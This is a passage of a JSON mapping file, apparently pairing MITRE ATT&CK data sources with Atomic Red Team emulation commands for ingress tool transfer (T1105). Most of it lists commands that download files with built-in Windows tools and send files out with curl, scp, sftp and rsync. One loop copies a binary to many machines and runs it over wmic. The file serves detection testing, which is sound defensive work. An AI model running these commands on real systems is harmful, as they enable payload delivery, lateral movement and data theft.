"Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service principal" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "enabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "disabled", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "locked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "unlocked", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "granted access to", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account modification", + "description": "A user account was modified.", + "source_data_element": "user", + "relationship": "removed access from", + "target_data_element": "user" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + "https://www.us-cert.gov/ncas/alerts/TA17-293A", + "http://carnal0wnage.attackresearch.com/2012/09/more-on-aptsim.html", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Destructive-Malware-Report.pdf", + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + ], + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1105", + "command_list": [ + "rsync -r #{local_path} #{username}@#{remote_host}:/tmp/victim-files\n", + "rsync -r #{local_path} #{username}@victim-host:#{remote_path}\n", + "rsync -r /tmp/adversary-rsync/ #{username}@#{remote_host}:#{remote_path}\n", + "rsync -r #{local_path} victim@#{remote_host}:#{remote_path}\n", + "rsync -r #{username}@#{remote_host}:/tmp/adversary-rsync/ #{local_path}\n", + "rsync -r #{username}@adversary-host:#{remote_path} #{local_path}\n", + "rsync -r #{username}@#{remote_host}:#{remote_path} /tmp/victim-files\n", + "rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}\n", + "scp #{local_file} #{username}@#{remote_host}:/tmp/victim-files/\n", + "scp /tmp/adversary-scp #{username}@#{remote_host}:#{remote_path}\n", + "scp #{local_file} #{username}@victim-host:#{remote_path}\n", + "scp #{local_file} victim@#{remote_host}:#{remote_path}\n", + "scp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "scp #{username}@#{remote_host}:/tmp/adversary-scp #{local_path}\n", + "scp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "sftp #{username}@#{remote_host}:/tmp/victim-files/ <<< $'put #{local_file}'\n", + "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'\n", + "sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'\n", + "sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n", + "sftp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "sftp #{username}@#{remote_host}:/tmp/adversary-sftp #{local_path}\n", + "sftp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt\n", + "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }\n", + "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f #{remote_file}\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }\n", + "C:\\Windows\\System32\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}\n", + "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} %temp%\\Atomic-license.txt\n", + "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "(New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", \"#{destination_path}\")\n", + "(New-Object System.Net.WebClient).DownloadFile(\"#{remote_file}\", \"$env:TEMP\\Atomic-license.txt\")\n", + "pushd \\\\localhost\\C$\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n", + "copy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n", + "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path #{local_path}\n", + "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url #{remote_file} -path %temp%\\Atomic-license.txt\n", + "timeout --preserve-status #{timeout} whois -h localhost -p #{remote_port} \"#{query}\" > #{output_file}\n", + null, + "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"#{query}\" > /tmp/T1105.whois.out\n", + "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"Hello from Atomic Red Team test T1105\" > #{output_file}\n", + "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File #{output_file}; Invoke-Item #{output_file}\n", + "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt\n", + "finger base64_filedata@localhost\n", + "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml\n", + "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled #{remote_url}\n", + "#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\programdata\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\\allthethingsx64.dll\n", + "C:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} --output c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\programdata\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o %Temp%\\allthethingsx64.dll\n", + "C:\\Windows\\System32\\Curl.exe -T #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --upload-file #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe -d #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --data #{file_path} #{remote_destination}\n", + "#{curl_path} -T #{file_path} www.example.com\n#{curl_path} --upload-file #{file_path} www.example.com\n#{curl_path} -d #{file_path} www.example.com\n#{curl_path} --data #{file_path} www.example.com\n", + "#{curl_path} -T c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --upload-file c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} -d c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --data c:\\temp\\atomictestfile.txt #{remote_destination}\n", + "PathToAtomicsFolder\\T1105\\src\\T1105.bat 1>NUL \n", + "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"$env:comspec\" \"\\\\$machine\\#{remote_drive_letter}$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\#{remote_drive_letter}$\\Windows\\Temp\\T1105.exe\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i #{remote_drive_letter}:\\Windows\\Temp\\T1105.exe\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "$machine_list = \"$env:temp\\T1105MachineList.txt\"\n$offline_list = \"$env:temp\\T1105OfflineHosts.txt\"\n$completed_list = \"$env:temp\\T1105CompletedHosts.txt\"\nforeach ($machine in get-content -path \"$machine_list\")\n{if (test-connection -Count 1 -computername $machine -quiet) \n{cmd /c copy \"#{binary_file}\" \"\\\\$machine\\C$#{exe_remote_folder}\"\necho $machine >> \"$completed_list\"\nwmic /node: \"$machine\" process call create \"regsvr32.exe /i C:#{exe_remote_folder}\"}\nelse\n{echo $machine >> \"$offline_list\"}}\n", + "del %TEMP%\\PrintBrm.zip >nul 2>&1 \n#{Path_PrintBrm} -b -d \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\ -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "del %TEMP%\\PrintBrm.zip >nul 2>&1 \nC:\\Windows\\System32\\spool\\tools\\PrintBrm.exe -b -d #{Path_unc} -f %TEMP%\\PrintBrm.zip -O FORCE\n", + "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} PathToAtomicsFolder\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "del %TEMP%\\redcanary.cab >nul 2>&1\nC:\\Windows\\System32\\replace.exe #{replace_cab} %TEMP% /A\n", + "del %TEMP%\\redcanary.cab >nul 2>&1\n#{Path_replace} \\\\127.0.0.1\\c$\\AtomicRedTeam\\atomics\\T1105\\src\\redcanary.cab %TEMP% /A\n", + "$wc=New-Object System.Net.WebClient;\n$output=\"PowerShellCore.msi\";\n$wc.DownloadFile(\"https://github.com/PowerShell/PowerShell/releases/download/v6.2.2/PowerShell-6.2.2-win-x64.msi\", $output);\nStart-Process msiexec.exe -ArgumentList \"/package PowerShellCore.msi /quiet ADD_EXPLORER_CONTEXT_MENU_OPENPOWERSHELL=1 ENABLE_PSREMOTING=1 REGISTER_MANIFEST=1\" -Wait;\n$env:Path += \";C:\\Program Files\\Powershell\\6\";\nStart-Process pwsh -ArgumentList \"-c #{location} -server #{server} - group #{group}\" -WindowStyle hidden;\n", + "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };\n$web = (New-Object System.Net.WebClient);\n$result = $web.DownloadFile(\"https://download.sysinternals.com/files/PSTools.zip\", \"PSTools.zip\");\nNew-Item -ItemType \"directory\" C:\\Windows\\System32\\PSTools -Force;\nAdd-Type -Assembly 'System.IO.Compression.FileSystem'; [System.IO.Compression.ZipFile]::ExtractToDirectory(\"PSTools.zip\", \"C:\\Windows\\System32\\PSTools\");\n" + ], + "commands": [ + { + "command": "rsync -r #{local_path} #{username}@#{remote_host}:/tmp/victim-files\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{local_path} #{username}@victim-host:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r /tmp/adversary-rsync/ #{username}@#{remote_host}:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{local_path} victim@#{remote_host}:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{username}@#{remote_host}:/tmp/adversary-rsync/ #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{username}@adversary-host:#{remote_path} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r #{username}@#{remote_host}:#{remote_path} /tmp/victim-files\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "rsync -r adversary@#{remote_host}:#{remote_path} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{local_file} #{username}@#{remote_host}:/tmp/victim-files/\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp /tmp/adversary-scp #{username}@#{remote_host}:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{local_file} #{username}@victim-host:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{local_file} victim@#{remote_host}:#{remote_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp #{username}@#{remote_host}:/tmp/adversary-scp #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "scp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:/tmp/victim-files/ <<< $'put #{local_file}'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:#{remote_path} <<< $'put /tmp/adversary-sftp'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@victim-host:#{remote_path} <<< $'put #{local_file}'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp victim@#{remote_host}:#{remote_path} <<< $'put #{local_file}'\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@adversary-host:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:#{remote_file} /tmp/victim-files/\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp #{username}@#{remote_host}:/tmp/adversary-sftp #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "sftp adversary@#{remote_host}:#{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cmd /c certutil -urlcache -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cmd /c certutil -urlcache -split -f #{remote_file} Atomic-license.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination #{local_path} }\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$datePath = \"certutil-$(Get-Date -format yyyy_MM_dd)\"\nNew-Item -Path $datePath -ItemType Directory\nSet-Location $datePath\ncertutil -verifyctl -split -f #{remote_file}\nGet-ChildItem | Where-Object {$_.Name -notlike \"*.txt\"} | Foreach-Object { Move-Item $_.Name -Destination Atomic-license.txt }\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer qcxjb7 /Priority HIGH #{remote_file} #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH #{remote_file} %temp%\\Atomic-license.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\bitsadmin.exe /transfer #{bits_job_name} /Priority HIGH https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt\", \"#{destination_path}\")\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object System.Net.WebClient).DownloadFile(\"#{remote_file}\", \"$env:TEMP\\Atomic-license.txt\")\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "pushd \\\\localhost\\C$\necho var fileObject = WScript.createobject(\"Scripting.FileSystemObject\");var newfile = fileObject.CreateTextFile(\"AtomicTestFileT1105.js\", true);newfile.WriteLine(\"This is an atomic red team test file for T1105. It simulates how OSTap worms accross network shares and drives.\");newfile.Close(); > AtomicTestT1105.js\nCScript.exe AtomicTestT1105.js //E:JScript\ndel AtomicTestT1105.js /Q >nul 2>&1\ndel AtomicTestFileT1105.js /Q >nul 2>&1\npopd\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "copy C:\\Windows\\System32\\cmd.exe C:\\svchost.exe\nC:\\svchost.exe /c echo T1105 > \\\\localhost\\c$\\T1105.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -path #{local_path}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "cd \"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18*\"\nMpCmdRun.exe -DownloadFile -url #{remote_file} -path %temp%\\Atomic-license.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "timeout --preserve-status #{timeout} whois -h localhost -p #{remote_port} \"#{query}\" > #{output_file}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": null, + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"#{query}\" > /tmp/T1105.whois.out\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "timeout --preserve-status #{timeout} whois -h #{remote_host} -p #{remote_port} \"Hello from Atomic Red Team test T1105\" > #{output_file}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File #{output_file}; Invoke-Item #{output_file}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "(New-Object Net.WebClient).DownloadString('#{target_remote_file}') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "finger base64_filedata@localhost\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/T1105.yaml\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "$imewdbled = $env:SystemRoot + \"\\System32\\IME\\SHARED\\IMEWDBLD.exe\"\n& $imewdbled #{remote_url}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\\users\\public\\music\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\\programdata\\allthethingsx64.dll\n#{curl_path} -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\\allthethingsx64.dll\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} --output c:\\users\\public\\music\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o c:\\programdata\\allthethingsx64.dll\nC:\\Windows\\System32\\Curl.exe -k #{file_download} -o %Temp%\\allthethingsx64.dll\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "C:\\Windows\\System32\\Curl.exe -T #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --upload-file #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe -d #{file_path} #{remote_destination}\nC:\\Windows\\System32\\Curl.exe --data #{file_path} #{remote_destination}\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "#{curl_path} -T #{file_path} www.example.com\n#{curl_path} --upload-file #{file_path} www.example.com\n#{curl_path} -d #{file_path} www.example.com\n#{curl_path} --data #{file_path} www.example.com\n", + "source": "atomics/T1105/T1105.yaml", + "name": "Atomic Red Team Test - Ingress Tool Transfer" + }, + { + "command": "#{curl_path} -T c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --upload-file c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} -d c:\\temp\\atomictestfile.txt #{remote_destination}\n#{curl_path} --data c:\\temp\\atomictestfile.txt 